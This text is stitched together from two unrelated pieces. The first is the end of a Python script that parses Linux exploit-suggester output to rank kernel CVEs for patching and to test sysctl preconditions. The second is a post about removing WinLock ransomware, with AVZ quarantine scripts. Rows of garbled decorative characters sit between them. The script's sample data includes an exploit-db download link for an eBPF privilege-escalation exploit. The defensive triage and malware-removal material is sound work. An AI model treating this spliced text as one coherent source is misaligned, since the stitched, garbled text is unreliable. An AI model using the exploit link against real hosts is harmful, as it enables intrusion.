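shown in the post plus one constructed entry (placeholder CVE id) so that the
script runs offline.
"""
import re
from typing import Dict, List, Optional

# Order of the tool's exposure scale; anything unknown sorts last.
EXPOSURE_RANK = {"highly probable": 0, "probable": 1, "less probable": 2}

_ENTRY_RE = re.compile(r"^\[\+\]\s+\[(?P<cve>[^\]]+)\]\s+(?P<name>\S+)")
# Heuristic for the "kernel.some_knob != 1" / "== 0" form seen in LES Comments.
_SYSCTL_COND_RE = re.compile(r"(kernel\.[\w.]+)\s*(!=|==)\s*(\d+)")


def parse_les_output(text: str) -> List[Dict[str, str]]:
    """Group each '[+] [CVE-...] name' header with the 'Key: value' lines under it."""
    entries: List[Dict[str, str]] = []
    current: Optional[Dict[str, str]] = None
    for raw in text.splitlines():
        line = raw.strip()
        header = _ENTRY_RE.match(line)
        if header:
            current = {"cve": header.group("cve"), "name": header.group("name")}
            entries.append(current)
        elif current is not None and ":" in line:
            key, _, value = line.partition(":")
            current[key.strip().lower().replace(" ", "_")] = value.strip()
    return entries


def triage_order(entries: List[Dict[str, str]]) -> List[str]:
    """CVE ids sorted most-exposed first (ties broken by id) for patch prioritisation."""
    ranked = sorted(entries, key=lambda e: (EXPOSURE_RANK.get(e.get("exposure", ""), 99), e["cve"]))
    return [e["cve"] for e in ranked]


def sysctl_precondition_holds(entry: Dict[str, str], sysctls: Dict[str, str]) -> Optional[bool]:
    """Evaluate 'kernel.x != N' / '== N' conditions from Comments against host sysctls.

    True: the exploit's stated precondition is met on this host.
    False: a hardening setting defeats the precondition.
    None: no sysctl condition is mentioned, or the host value is unknown."""
    conds = _SYSCTL_COND_RE.findall(entry.get("comments", ""))
    if not conds:
        return None
    for name, op, expected in conds:
        actual = sysctls.get(name)
        if actual is None:
            return None
        if (actual == expected) != (op == "=="):
            return False
    return True


# Constructed sample: the real entry from the post plus a placeholder entry.
SAMPLE_OUTPUT = """\
[+] [CVE-2017-16995] eBPF_verifier
   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: highly probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-XXXX-YYYY] constructed_example
   Exposure: probable
   Comments: needs a writable /tmp
"""

if __name__ == "__main__":
    found = parse_les_output(SAMPLE_OUTPUT)
    host_sysctls = {"kernel.unprivileged_bpf_disabled": "1"}  # constructed host state
    for cve in triage_order(found):
        entry = next(e for e in found if e["cve"] == cve)
        print(cve, entry.get("exposure"), "precondition:",
              sysctl_precondition_holds(entry, host_sysctls))
```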
β β β Uππ»βΊπ«Δπ¬πβ β β β
🦑How to get rid of SMS Trojans WinLock (Windows Blocker) :
1) "Get Accelerator" (Trojan-Ransom.Win32.Agent.gc)
The first example of a ransomware Trojan that caused a large-scale outbreak was a malicious product calling itself "Get Accelerator". It was entered into the Kaspersky Lab database as Trojan-Ransom.Win32.Agent.gc; Dr.Web calls it "Trojan.Winlock.366", and BitDefender heuristically identified it as "Gen:Trojan.Heur.Hype.cy4@aSUBebjk".
We saw the first cases of infection with this program around the middle of October last year. By the start of the last ten days of the month there was a sharp surge in infections, which, incidentally, was repeated towards the end of the year; the outbreaks are clearly visible on the summary graph of search queries compiled from the LiveInternet analytics service.
2) "Get Accelerator" was, in essence, one of the primitive representatives of the "ransomware factory" products. The user was presented with an ordinary application window without controls, which is relatively easy to make in a visual programming environment, with a couple of threatening labels and a timer; at the same time the network connection was disrupted, so the user could not access the Internet.
3) The malware consisted of two components: the driver %WinDir%\dmgr134.sys and the injected dynamic link library %System32%\{991F0AD1-DA5D-4dc3-B0BA-F46BA0F1D3CB}.dll; both components were clearly visible in the results of an AVZ system study, and their names were constant, which made it possible to draw up standard recommendations for their removal:
To remove a typical Trojan-Ransom.Win32.Agent.gc (Get Accelerator) from a regular home or office PC, execute the following script in AVZ:
Code:
begin
SearchRootkit(true, true);
SetAVZGuardStatus(true);
QuarantineFile('%WinDir%\dmgr134.sys', '');
QuarantineFile('%System32%\{991F0AD1-DA5D-4dc3-B0BA-F46BA0F1D3CB}.dll', '');
DeleteFile('%System32%\{991F0AD1-DA5D-4dc3-B0BA-F46BA0F1D3CB}.dll');
DeleteFile('%WinDir%\dmgr134.sys');
BC_ImportALL;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.
The operating system will reboot.
4) "uFast Download Manager" (Trojan-Ransom.Win32.SMSer.qm, Trojan.Win32.Agent.dapb)
The second representative of the family was the so-called "uFast Download Manager", named "Trojan-Ransom.Win32.SMSer.qm" and "Trojan.Win32.Agent.dapb" in the Kaspersky Lab databases and "Trojan.Botnetlog.11" according to Dr.Web; BitDefender again identified the malware heuristically, naming it "BehavesLike:Trojan.UserStartup".
The attack by this malicious program occurred in early November, when the first wave of Get Accelerator had already been extinguished. An epidemic surge is clearly visible again on the search query graph, although it was not as powerful as in the previous sample.
β β β Uππ»βΊπ«Δπ¬πβ β β β